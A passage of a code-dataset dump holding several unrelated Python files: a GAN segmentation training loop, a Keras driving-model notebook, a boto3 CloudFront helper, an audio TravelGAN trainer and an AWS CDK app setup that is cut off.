dataset = dataset_train,\n batch_size=train_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=True)\n\nloader_val = torch.utils.data.DataLoader(\n dataset = dataset_val,\n batch_size=val_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=False)\n\n# ===================================\n# Set Train Env\n# ===================================\ntorch.cuda.set_device(cuda_id)\ncuda = True if torch.cuda.is_available() else False\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nif multi_gpu:\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available()) else \"cpu\")\n ngpu = num_gpu # should be modified to specify multiple gpu ids to be used\nelif cuda_id:\n device = torch.device(cuda_id)\n ngpu = 1\nelse:\n device = torch.device('cpu')\n ngpu = 0\n\n# ===================================\n# Set Model\n# ===================================\nmodel_discriminator = discriminator.Discriminator().to(device)\nmodel_segment_encoder = generator.Encoder(num_in_channel, num_out_channel).to(device)\nmodel_segment_decoder_seg = generator.DecoderSeg(num_in_channel, num_out_channel).to(device)\nmodel_segment_decoder_region = generator.DecoderRegion(num_in_channel, num_out_channel).to(device)\n\n# if multiple gpus are used, set dataparallel\nif multi_gpu == True:\n model_discriminator = nn.DataParallel(model_discriminator, list(range(num_gpu)))\n model_segment_encoder = nn.DataParallel(model_segment_encoder, list(range(num_gpu)))\n model_segment_decoder_seg = nn.DataParallel(model_segment_decoder_seg, list(range(num_gpu)))\n model_segment_decoder_region = nn.DataParallel(model_segment_decoder_region, list(range(num_gpu)))\n\n# init model parameters\nmodel_discriminator.apply(weights_init)\n\n# optimizers\noptimizer_discriminator = optim.Adam(model_discriminator.parameters(), lr = init_lr_discri, betas=(beta1_discri, 0.999))\nseg_parameters = list(model_segment_encoder.parameters()) + list(model_segment_decoder_seg.parameters()) + list(model_segment_decoder_region.parameters())\noptimizer_segment = optim.Adam(seg_parameters, lr = init_lr_seg, betas=(beta1_generator, 0.999))\n\nscheduler_discriminator = lr_scheduler.scheduler_learning_rate_sigmoid_double(optimizer_discriminator, lr_initial=init_lr_discri, lr_top=top_lr_discri, lr_final=final_lr_discri, numberEpoch=(num_epoch), ratio=0.25, alpha=10, beta=0, epoch=-1) \nscheduler_segment = lr_scheduler.scheduler_learning_rate_sigmoid_double(optimizer_segment, lr_initial=init_lr_seg, lr_top=top_lr_seg, lr_final=final_lr_seg, numberEpoch=(num_epoch), ratio=0.25, alpha=10, beta=0, epoch=-1)\n\n# ==================================================\n# Init variables to save training results\n# ==================================================\nt = Variable(torch.Tensor([0.5])).to(device) # set threshold value\nlosses_discri = []\nlosses_seg = []\ntrain_iou = []\ntrain_epoch_avg_iou = []\ntrain_best_epoch_avg_iou = [0, 0]\nval_iou = []\nval_epoch_avg_iou = []\nval_best_epoch_avg_iou = [0, 0]\n\n# ==============================\n# Start Training\n# ==============================\nfor epoch in range(num_epoch):\n if epoch == 0:\n print('device:', device)\n print(\"start train epoch{}:\".format(epoch))\n scheduler_discriminator.step(epoch)\n scheduler_segment.step(epoch)\n real_label = 1\n fake_label = 0\n scores_sum_iou = 0\n num_iters_discri = 0\n num_iters_seg = 0\n\n # =============================\n # Train\n # =============================\n prior_dataloader_iterator = iter(loader_prior)\n for i, data_input in enumerate(loader_train, 0):\n try:\n data_prior = next(prior_dataloader_iterator)\n except StopIteration:\n prior_dataloader_iterator = iter(loader_prior)\n data_prior = next(prior_dataloader_iterator)\n imgs_prior = Variable(data_prior.type(Tensor)).to(device)\n imgs_input = Variable(data_input[0].type(Tensor)).to(device)\n imgs_gt = Variable(data_input[1].type(Tensor)).to(device)\n\n # -----------------------------\n # Train Discriminator\n # -----------------------------\n gan_r1.toggle_grad(model_segment_encoder, False)\n gan_r1.toggle_grad(model_segment_decoder_seg, False)\n gan_r1.toggle_grad(model_segment_decoder_region, False)\n gan_r1.toggle_grad(model_discriminator, True)\n # model_segment_decoder_seg.train()\n model_discriminator.train()\n optimizer_discriminator.zero_grad()\n\n # train discriminator with prior data\n imgs_prior.requires_grad_()\n validity_prior = model_discriminator(imgs_prior)\n loss_discri_real = gan_r1.compute_loss(validity_prior, 1)\n loss_discri_real.backward(retain_graph=True)\n reg = k_r1 * gan_r1.compute_grad2(validity_prior, imgs_prior).mean()\n reg.backward()\n\n # train discriminator with generated segmentation result\n with torch.no_grad():\n code = model_segment_encoder(imgs_input)\n imgs_seg = model_segment_decoder_seg(code)\n # imgs_roi, imgs_bg = model_segment_decoder_region(code)\n imgs_seg.requires_grad_()\n validity_seg = model_discriminator(imgs_seg)\n loss_discri_fake = gan_r1.compute_loss(validity_seg, 0)\n loss_discri_fake.backward()\n\n # full discriminator loss\n loss_discri = loss_discri_real + reg + loss_discri_fake\n\n # optimization\n optimizer_discriminator.step()\n num_iters_discri += 1\n\n if i % num_discri == 0:\n # ----------------------------------\n # Train Segmentation Generator\n # ----------------------------------\n model_segment_encoder.train()\n model_segment_decoder_seg.train()\n model_segment_decoder_region.train()\n gan_r1.toggle_grad(model_segment_encoder, True)\n gan_r1.toggle_grad(model_segment_decoder_seg, True)\n gan_r1.toggle_grad(model_segment_decoder_region, True)\n gan_r1.toggle_grad(model_discriminator, False)\n optimizer_segment.zero_grad()\n \n # get segmentation result\n code = model_segment_encoder(imgs_input)\n imgs_seg = model_segment_decoder_seg(code)\n imgs_roi, imgs_bg = model_segment_decoder_region(code)\n validity_fake = model_discriminator(imgs_seg)\n loss_seg = ms_seg_loss.mumford_shah_seg_loss(imgs_roi, imgs_bg, imgs_seg, imgs_input, validity_fake, gamma1_tv_seg, gamma2_tv_region)\n loss_seg.backward()\n optimizer_segment.step()\n num_iters_seg += 1\n\n # threshold the segmentation result\n imgs_seg = (imgs_seg > t).float() * 1\n imgs_gt = (imgs_gt > t).float() * 1\n \n # ---------------------\n # Get Results\n # ---------------------\n # Compute metric score\n metric_iou = metric_seg.evaluate_iou(imgs_seg, imgs_gt)\n print('[*TRAIN*][Epoch {}/{}] [Batch {}/{}] [Discri loss: {}] [Seg loss: {}] [IoU: {}]'.format(epoch+1, num_epoch, i+1, len(loader_train), loss_discri.item(), loss_seg.item(), metric_iou))\n\n losses_discri.append(loss_discri.item())\n losses_seg.append(loss_seg.item())\n train_iou.append(metric_iou)\n scores_sum_iou += metric_iou\n with open(csv_losses, 'a', newline='') as f:\n writer_losses = csv.writer(f)\n writer_losses.writerow([epoch+1, i+1, loss_discri.item(), loss_seg.item()])\n with open(csv_metric_train, 'a', newline='') as f:\n writer_train = csv.writer(f)\n writer_train.writerow([epoch+1, i+1, metric_iou])\n \n # -----------------------------------------\n # Plot images to monitor training\n # -----------------------------------------\n if num_iters_seg == 0 or (num_iters_seg * num_discri) % monitor_interval == 0:\n # plot images\n overlapped = torch.zeros(num_plot_img, 3, imgs_seg.size(2), imgs_seg.size(3))\n overlapped[:,0,:,:] = imgs_gt[:num_plot_img].squeeze(1)\n overlapped[:,1,:,:] = imgs_seg[:num_plot_img].squeeze(1)\n \n plot_segmented = imgs_seg.cpu().detach().numpy()\n plot_gt = imgs_gt.cpu().detach().numpy()\n plot_input = imgs_input.cpu().detach().numpy()\n plot_prior = imgs_prior.cpu().detach().numpy()\n plot_roi = imgs_roi.cpu().detach().numpy()\n plot_bg = imgs_bg.cpu().detach().numpy()\n\n plot_segmented = vutils.make_grid(torch.from_numpy(plot_segmented[:num_plot_img]), padding=2, pad_value=1)\n plot_gt = vutils.make_grid(torch.from_numpy(plot_gt[:num_plot_img]), padding=2, pad_value=1)\n plot_input = vutils.make_grid(torch.from_numpy(plot_input[:num_plot_img]), padding=2, pad_value=1)\n plot_prior = vutils.make_grid(torch.from_numpy(plot_prior[:num_plot_img]), padding=2, pad_value=1)\n plot_roi = vutils.make_grid(torch.from_numpy(plot_roi[:num_plot_img]), padding=2, pad_value=1)\n plot_bg = vutils.make_grid(torch.from_numpy(plot_bg[:num_plot_img]), padding=2, pad_value=1)\n\n imgs = [[plot_segmented, plot_gt, plot_input], [plot_prior, plot_roi, plot_bg]]\n imgs_list = [plot_segmented, plot_gt, plot_input, plot_prior, plot_roi, plot_bg] # flat the list imgs\n img_names = ['segmented', 'ground truth', 'input image', 'prior', 'foreground', 'background']\n fig, axes = plt.subplots(len(imgs), len(imgs[0]), figsize=(18,9))\n for plot_i, ax in enumerate(axes.flat):\n ax.axis(\"off\")\n ax.set_title(img_names[plot_i])\n ax.imshow(np.transpose(imgs_list[plot_i],(1,2,0)), vmin=0.0, vmax=1.0)\n if plot_i + 1 == len(imgs_list):\n break\n plt.show()\n file_name = '{}/results_train'.format(output_dir)\n fig.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # Plot loss & metric score curves\n curve_titles = [\n \"Discriminator Loss\",\n \"Segmentation Loss\",\n \"IoU - Train (Iteration)\"\n ]\n curve_data = [[losses_discri], [losses_seg], [train_iou]]\n curve_labels = [[\"loss_discriminator\"], [\"loss_seg\"], [\"iou\"]]\n curve_xlabels = [\"iterations\", \"iterations\", \"iterations\"]\n curve_ylabels = [\"loss\", \"loss\", \"score\"]\n curve_filenames = [\"lr-curve-discri\", \"lr-curve-seg\", \"iou-train-iter\"]\n\n for i_curve, curve_data in enumerate(curve_data):\n plt.figure(figsize=(10,5))\n plt.title(curve_titles[i_curve])\n for i_curve_data, curve_data_item in enumerate(curve_data):\n plt.plot(curve_data_item,label=curve_labels[i_curve][i_curve_data])\n plt.xlabel(curve_xlabels[i_curve])\n plt.ylabel(curve_ylabels[i_curve])\n plt.legend()\n file_name = '{}/{}'.format(output_dir, curve_filenames[i_curve])\n plt.show()\n plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # get epoch avg iou\n epoch_avg_iou = scores_sum_iou/num_iters_seg\n train_epoch_avg_iou.append(epoch_avg_iou)\n\n # track the best epoch avg iou\n if epoch == 0:\n train_best_epoch_avg_iou = [epoch_avg_iou, epoch + 1]\n else:\n if train_best_epoch_avg_iou[0] < epoch_avg_iou:\n train_best_epoch_avg_iou = [epoch_avg_iou, epoch + 1]\n with open(txt_scores_train, 'r+') as f:\n f.write('*************[Train Epoch Average Best IoU]*************' + os.linesep)\n f.write('best iou : {} ([epoch]{})'.format(train_best_epoch_avg_iou[0], train_best_epoch_avg_iou[1]) + os.linesep)\n\n # plot epoch avg iou\n plt.figure(figsize=(10,5))\n plt.title(\"IoU - Train (Epoch Avg)\")\n plt.plot(train_epoch_avg_iou,label=\"iou\")\n plt.xlabel(\"epochs\")\n plt.ylabel(\"score\")\n plt.legend()\n file_name = '{}/iou-train-epoch-avg'.format(output_dir)\n plt.show()\n plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # ================================================\n # Validation\n # ================================================\n val_scores_sum_iou = 0\n num_iters_val = 0\n model_discriminator.eval()\n model_segment_encoder.eval()\n model_segment_decoder_seg.eval()\n model_segment_decoder_region.eval()\n with torch.no_grad():\n for i, data_input in enumerate(loader_val, 0):\n imgs_input = Variable(data_input[0].type(Tensor)).to(device)\n imgs_gt = Variable(data_input[1].type(Tensor)).to(device)\n\n # get segmentation mask\n code = model_segment_encoder(imgs_input)\n imgs_seg = model_segment_decoder_seg(code)\n imgs_roi, imgs_bg = model_segment_decoder_region(code)\n\n num_iters_val += 1\n\n imgs_seg = (imgs_seg > t).float() * 1\n imgs_gt = (imgs_gt > t).float() * 1\n # flatten input and grount truth images\n metric_iou = metric_seg.evaluate_iou(imgs_seg, imgs_gt)\n\n # Collect score info\n val_iou.append(metric_iou)\n with open(csv_metric_val, 'a', newline='') as f:\n writer_val = csv.writer(f)\n writer_val.writerow([epoch+1, i+1, metric_iou])\n \n val_scores_sum_iou += metric_iou\n\n # track the best validation iou\n if (epoch == 0) and (i == 0):\n val_best_score_iou = [metric_iou, epoch+1, i+1] \n else:\n if val_best_score_iou[0] < metric_iou:\n val_best_score_iou = [metric_iou, epoch+1, i+1]\n\n # -----------------------------------------\n # Plot images to monitor validation\n # -----------------------------------------\n if num_iters_val == 0 or num_iters_val % monitor_interval == 0:\n print('[*VAL*][Epoch {}/{}] [Batch {}/{}] [IoU: {}]'.format(epoch+1, num_epoch, i+1, len(loader_val), metric_iou))\n\n # plot metric score curve\n plt.figure(figsize=(10,5))\n plt.title(\"IoU - Val (Iteration)\")\n plt.plot(val_iou,label=\"iou\")\n plt.xlabel(\"iterations\")\n plt.ylabel(\"score\")\n plt.legend()\n file_name = '{}/iou-val-iter'.format(output_dir)\n plt.show()\n plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # get epoch avg iou\n val_avg_epoch_iou = val_scores_sum_iou/num_iters_val\n val_epoch_avg_iou.append(val_avg_epoch_iou)\n \n # plot epoch avg iou\n plt.figure(figsize=(10,5))\n plt.title(\"IoU - Val (Epoch Avg)\")\n plt.plot(val_epoch_avg_iou,label=\"iou\")\n plt.xlabel(\"epochs\")\n plt.ylabel(\"score\")\n plt.legend()\n file_name = '{}/iou-val-epoch-avg'.format(output_dir)\n plt.show()\n plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # ======================================================\n # Save Model by the Best Validation IoU Score\n # ======================================================\n if epoch == 0:\n val_best_epoch_avg_iou = [val_avg_epoch_iou, epoch+1]\n else:\n if val_best_epoch_avg_iou[0] < val_avg_epoch_iou:\n val_best_epoch_avg_iou = [val_avg_epoch_iou, epoch+1]\n dir_save_model = '{}/trained_model_by_best_val_iou.pth'.format(output_dir)\n torch.save({\n 'epoch': epoch,\n 'model_discriminator': model_discriminator.state_dict(),\n 'model_segment_encoder': model_segment_encoder.state_dict(),\n 'model_segment_decoder_seg': model_segment_decoder_seg.state_dict(),\n 'model_segment_decoder_region': model_segment_decoder_region.state_dict(),\n }, dir_save_model)\n print('[*] model is saved by best val iou score')\n with open(txt_scores_val, 'r+') as f:\n f.write('*************[Val Epoch Average Best IoU]*************' + os.linesep)\n f.write('best iou : {} ([epoch]{})'.format(val_best_epoch_avg_iou[0], val_best_epoch_avg_iou[1]) + os.linesep) \n\n\n","sub_path":"train_shape_seg.py","file_name":"train_shape_seg.py","file_ext":"py","file_size_in_byte":23138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"370533309","text":"import lux\nfrom lux import Parameter\n\n\nclass Extension(lux.Extension):\n _config = [\n Parameter('SERVER_CONFIGURATION', 'nginx_reverse_proxy', ''),\n Parameter('DOMAIN_NAME', None,\n 'Full domain name of your web site, e.g. '\n 'http://www.example.com')\n ]\n","sub_path":"lux/extensions/deploy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"631364854","text":"\n# coding: utf-8\n\n# In[185]:\n\nimport cv2\nimport numpy as np\nimport csv\nimport os\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport itertools\nfrom PIL import Image\nimport math\nimport zipfile\nimport io\nimport time\nimport copy\n\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Dropout, Flatten, Lambda, ELU\nfrom keras.layers import Cropping2D\nfrom keras.layers import BatchNormalization, Input\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.backend import tf as ktf\n\n\n# In[186]:\n\n# This notebook is able to run in both jupyter (interactive mode) and \n# floydhub (imperative mode).\n\ndef runin_jupyter():\n try:\n get_ipython().magic('matplotlib inline')\n except NameError:\n return False\n return True\n\nif runin_jupyter():\n INPUT_ZIPS = ['./new_data/turn2d.zip']\n TMP_DIR = '/tmp/'\n OUTPUT_DIR = './'\n LOAD_MODEL = 'model2_turn2.h5'\nelse:\n # Useful for floydhub.\n INPUT_ZIPS = ['/input/udacity.zip', 'turn1.zip']\n TMP_DIR = '/tmp/'\n OUTPUT_DIR = '/output/'\n LOAD_MODEL = False\n\nprint('Input zips:', INPUT_ZIPS)\nDELTA = 0.1\nprint('Delta:', DELTA)\nprint('Load previous model:', LOAD_MODEL)\nSWING_THRESHOLD = 0.1\nprint('Swing threshold:', SWING_THRESHOLD)\n\n\n# In[187]:\n\n# Extract zips to temp folder.\nTMP_DIRS = []\ntic = time.time()\nfor zipf in INPUT_ZIPS:\n with zipfile.ZipFile(zipf, 'r') as z:\n base = os.path.splitext(os.path.basename(zipf))[0]\n target_dir = os.path.join(TMP_DIR, base)\n print('Extracting to:', target_dir)\n TMP_DIRS.append(target_dir)\n z.extractall(target_dir)\nprint('Time in unzip:', time.time() - tic)\n\n\n# In[188]:\n\nclass Sample:\n def __init__(self, path, category, angle, flipped=False):\n self.path = path\n self.category = category # 0 - center, 1 - left, 2 - right\n self.angle = angle\n self.flipped = flipped\n \n def getX(self):\n image = Image.open(self.path)\n X = np.asarray(image)\n if self.flipped:\n X = np.fliplr(X)\n return X\n \n def getY(self):\n DELTAS = [0.0, -DELTA, DELTA] # center, left, right\n y = self.angle + DELTAS[self.category]\n if self.flipped:\n y = -y\n return y\n \n def getRawY(self):\n return self.angle * (-1 if self.flipped else 1)\n\nclass DrivingLog:\n \"\"\"\n DrivingLog transforms input files into training/validation/test data.\n It's a data container, the only purpose is to provide these data after\n construction.\n \n Constructor parameters:\n input_dirs: the folders that contain driving_log.csv.\n delta: adjustment of left / right camera angle.\n batch_size: batch size of data generator.\n \n Exposed members:\n train_gen, train_size: training data generator and # of samples.\n valid_gen, valid_size\n test_gen, test_size\n train_samples\n \"\"\"\n \n def __init__(self, input_dirs, batch_size):\n samples = []\n for input_dir in input_dirs:\n csvf = open(os.path.join(input_dir, 'driving_log.csv'), 'r')\n reader = csv.reader(csvf, delimiter=',')\n rows = [row for row in reader]\n samples.extend(self.__process_rows(rows, input_dir))\n \n samples = self.__augment(samples)\n \n # Split to training/validation/test data.\n np.random.shuffle(samples)\n train_samples, valid_samples = train_test_split(samples, test_size=0.2)\n valid_samples, test_samples = train_test_split(valid_samples, test_size=0.5)\n \n self.train_size = len(train_samples)\n self.valid_size = len(valid_samples)\n self.test_size = len(test_samples)\n \n self.train_gen = self.__generator(train_samples, batch_size)\n self.valid_gen = self.__generator(valid_samples, batch_size)\n self.test_gen = self.__generator(test_samples, batch_size)\n \n self.train_samples = train_samples\n \n def __augment(self, samples):\n aug = []\n # Flip the image.\n for s in samples:\n new = copy.deepcopy(s)\n new.flipped=True\n aug.append(new)\n return samples + aug\n \n def __process_rows(self, rows, input_dir):\n samples = []\n for row in rows:\n assert len(row) >= 4\n for i in range(3):\n s = row[i].strip()\n imgf = os.path.join(input_dir, 'IMG', os.path.basename(s))\n new_sample = Sample(path=imgf, category=i,\n angle=float(row[3]))\n samples.append(new_sample)\n return samples\n \n def __generator(self, samples, batch_size):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates \n total_secs = 0\n np.random.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n tic = time.time()\n for batch_sample in batch_samples:\n X = batch_sample.getX()\n y = batch_sample.getY()\n images.append(X)\n angles.append(y)\n total_secs += time.time() - tic\n\n Xs = np.array(images)\n ys = np.array(angles)\n yield sklearn.utils.shuffle(Xs, ys)\n print('Total seconds in generator:', total_secs)\n\n\n# In[189]:\n\nBATCH_SIZE = 32\n\ndriving = DrivingLog(input_dirs=TMP_DIRS, batch_size=BATCH_SIZE)\n\nprint('Batch size:', BATCH_SIZE)\n\n\n# In[190]:\n\nprint('Sizes of data: training %d validation %d test %d' % \n (driving.train_size, driving.valid_size, driving.test_size))\n\nif runin_jupyter():\n y_train = [s.getRawY() for s in driving.train_samples]\n print('Histogram of steering angles')\n plt.hist(y_train, bins=64)\n \n n_zero = sum(1 for y in y_train if abs(y) < SWING_THRESHOLD)\n print('Zero fraction in angles:', n_zero * 1.0 / len(y_train),\n 'with threshold:', SWING_THRESHOLD)\n \n\n\n# In[191]:\n\nprint('Preview one sample:')\nbatch = next(driving.train_gen)\nx = batch[0][0]\ny = batch[1][0]\n\nprint('shape:', x.shape, 'angle:', y)\nif runin_jupyter():\n plt.imshow(x)\n\n\n# In[192]:\n\n# Creates the deep learning keras model.\n# The input must have the same shape as origional image because we want\n# to use provided drive.py directly to run the car in self-driving mode.\n\nORIG_SHAPE = (160, 320, 3) # row, col, channel\n\ndef course_model():\n print('Course Model')\n model = Sequential()\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Flatten())\n model.add(Dense(1))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\ndef nvidia_model():\n print('Nvidia Model')\n model = Sequential()\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Convolution2D(24, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(36, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(48, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='relu'))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='relu'))\n model.add(Flatten())\n model.add(Dense(1164, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(50, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(1, activation='tanh'))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\n# https://github.com/commaai/research/blob/master/train_steering_model.py\ndef comma_model():\n print('Comma Model')\n model = Sequential()\n # Crop the input image.\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Convolution2D(16, 8, 8, subsample=(4, 4), border_mode=\"same\"))\n model.add(ELU())\n model.add(Convolution2D(32, 5, 5, subsample=(2, 2), border_mode=\"same\"))\n model.add(ELU())\n model.add(Convolution2D(64, 5, 5, subsample=(2, 2), border_mode=\"same\"))\n model.add(Flatten())\n model.add(Dropout(0.2))\n model.add(ELU())\n model.add(Dense(512))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Dense(1))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\n\n# In[193]:\n\n# Model selection.\nmodel = comma_model()\n\n\n# In[194]:\n\n# Training.\nEPOCH = 1\n\nif LOAD_MODEL:\n model = load_model(LOAD_MODEL)\n\nmodel.fit_generator(generator=driving.train_gen, samples_per_epoch=driving.train_size,\n nb_epoch=EPOCH,\n validation_data=driving.valid_gen, nb_val_samples=driving.valid_size)\nmodel.save(os.path.join(OUTPUT_DIR, 'model.h5'))\n\n\n# In[195]:\n\n# Testing.\ntest_loss = model.evaluate_generator(driving.test_gen, val_samples=driving.test_size)\nprint('Test loss:', test_loss)\n\n\n# In[196]:\n\n# Convert to model.py and save to floydhub folder.\nif runin_jupyter():\n get_ipython().system('jupyter nbconvert --to script model.ipynb && mv model.py floydhub/')\n\n\n# In[ ]:\n\n\n\n","sub_path":"floydhub/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92707557","text":"import boto3\nimport time\n\n\ndef make_config(origin_domain, origin_id, access_id, path='/'):\n return {'Aliases': {'Quantity': 0},\n 'CacheBehaviors': {'Quantity': 0},\n 'CallerReference': str(time.time()),\n 'Comment': '',\n 'CustomErrorResponses': {'Quantity': 0},\n 'DefaultCacheBehavior': {'AllowedMethods': {'CachedMethods': {'Items': ['HEAD',\n 'GET'],\n 'Quantity': 2},\n 'Items': ['HEAD', 'GET'],\n 'Quantity': 2},\n 'Compress': False,\n 'DefaultTTL': 86400,\n 'FieldLevelEncryptionId': '',\n 'ForwardedValues': {'Cookies': {'Forward': 'none'},\n 'Headers': {'Items': ['Access-Control-Request-Headers',\n 'Access-Control-Request-Method',\n 'Origin'],\n 'Quantity': 3},\n 'QueryString': False,\n 'QueryStringCacheKeys': {'Quantity': 0}},\n 'LambdaFunctionAssociations': {'Quantity': 0},\n 'MaxTTL': 31536000,\n 'MinTTL': 0,\n 'SmoothStreaming': False,\n 'TargetOriginId': origin_id,\n 'TrustedSigners': {'Enabled': False, 'Quantity': 0},\n 'ViewerProtocolPolicy': 'redirect-to-https'},\n 'DefaultRootObject': '',\n 'Enabled': True,\n 'HttpVersion': 'http2',\n 'IsIPV6Enabled': True,\n 'Logging': {'Bucket': '',\n 'Enabled': False,\n 'IncludeCookies': False,\n 'Prefix': ''},\n 'OriginGroups': {'Quantity': 0},\n 'Origins': {'Items': [{'CustomHeaders': {'Quantity': 0},\n 'DomainName': origin_domain,\n 'Id': origin_id,\n 'OriginPath': path,\n 'S3OriginConfig': {'OriginAccessIdentity': f'origin-access-identity/cloudfront/{access_id}'}}],\n 'Quantity': 1},\n 'PriceClass': 'PriceClass_All',\n 'Restrictions': {'GeoRestriction': {'Quantity': 0, 'RestrictionType': 'none'}},\n 'ViewerCertificate': {'CertificateSource': 'cloudfront',\n 'CloudFrontDefaultCertificate': True,\n 'MinimumProtocolVersion': 'TLSv1'},\n 'WebACLId': ''}\n\n\n\nclass CloudFront:\n def __init__(self, proj, stage, path='/'):\n self.cf = boto3.client('cloudfront')\n self.proj = proj\n self.stage = stage\n self.path = path\n\n def _create_access_identity(self):\n name = f\"access-identity-{self.proj}-{self.stage}\"\n resp = self.cf.create_cloud_front_origin_access_identity(\n CloudFrontOriginAccessIdentityConfig={\n \"CallerReference\": str(time.time()),\n \"Comment\": name}\n )\n access_id = resp['CloudFrontOriginAccessIdentity']['Id']\n return access_id\n\n def _create_distribution(self, origin_domain, origin_id, access_id):\n cfg = make_config(origin_domain, origin_id, access_id, path=self.path)\n resp = self.cf.create_distribution(DistributionConfig=cfg)\n return resp['Distribution']\n\n def create_distribution_s3(self, bucket_name):\n o_domain = f\"{bucket_name}.s3.amazonaws.com\"\n o_id = f\"S3-{bucket_name}\"\n access_id = self._create_access_identity()\n return self._create_distribution(o_domain, o_id, access_id)\n","sub_path":"hatano/cloudfront.py","file_name":"cloudfront.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"361111027","text":"from data import AudioData\nfrom trainer import TravelGAN\nfrom torch.utils.data.dataloader import DataLoader\nfrom utils import get_device, load_json, get_writer\nfrom statistics import mean\nimport numpy as np\n\n\ndef train_model(row_dataset_a, row_dataset_b, hparams, log, device=0):\n\n device = get_device(device)\n print('Loading data..')\n L = hparams[\"L\"]\n\n dataset_a = AudioData(row_dataset_a)\n dataset_b = AudioData(row_dataset_b)\n\n loader_a = DataLoader(dataset_a, **hparams['loading'])\n loader_b = DataLoader(dataset_b, **hparams['loading'])\n print(f'Shape of dsA: {dataset_a.data.shape}')\n print(f'Shape of dsB: {dataset_b.data.shape}')\n\n model = TravelGAN(**hparams['model'], L=L, device=device)\n model.double()\n writer, monitor = get_writer(log)\n print('Start training..')\n\n for epoch in range(hparams['n_epochs']):\n # Run one epoch\n dis_losses, gen_losses = [], []\n for x_a, x_b in zip(loader_a, loader_b):\n # Loading on device\n x_a = x_a.to(device, non_blocking=True)\n x_b = x_b.to(device, non_blocking=True)\n\n # Calculate losses and update weights\n dis_loss = model.dis_update(x_a, x_b)\n gen_loss = model.gen_update(x_a, x_b)\n dis_losses.append(dis_loss)\n gen_losses.append(gen_loss)\n\n # Logging losses\n dis_loss, gen_loss = mean(dis_losses), mean(gen_losses)\n writer.add_scalar('dis', dis_loss, epoch)\n writer.add_scalar('gen', gen_loss, epoch)\n print(monitor.format(epoch, gen_loss, dis_loss))\n\n # Saving model every n_save_steps epochs\n if (epoch + 1) % hparams['n_save_steps'] == 0:\n model.save(log, epoch)\n\n return model\n\n\nif __name__ == '__main__':\n\n dsA = np.load(r'./samples/mellog_shaped_digits.npy')\n dsB = np.load(r'./samples/mellog_shaped_men.npy')\n\n train_model(dsA, dsB,\n hparams=load_json('./configs', 'audata_conf'),\n log='logging')\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390562702","text":"#!/usr/bin/env python3\n\nfrom aws_cdk import core\nfrom awsomepipeline.application_stack import WebAppStack\nfrom awsomepipeline.pipeline_stack import PipelineStack\nfrom awsomepipeline.vpc_stack import VpcStack\nimport os\n\nenv=core.Environment(\n account=os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n region=os.environ[\"CDK_DEFAULT_REGION\"])\n\napp = core.App()\n\ncontext = app.node.try_get_context(\"stack\")\n\nstack_vpc = VpcStack(app,\"awsome-vpc\", env=env)\n\nif context == \"prd\":\n WebAppStack(app, \"awsome-prd\", vpc=stack_vpc.vpc, env=env)\nelif context == \"stg\":\n WebAppStack(app, \"awsome-stg\", vpc=stack_vpc.vpc, env_level=\"stg\", env=env)\nelif context == \"pipeline\":\n PipelineStack(\n app,\n \"AWSome-pipeline\",\n git_token_key=\"my_secret_token\",\n github_branch=\"master\",\n github_owner=\"enricopesce\",\n github_repo=\"AWSome-pipeline\",\n env=env\n )\nelse:\n print(\"Please define the stack context: prd | stg | pipeline. es: --context 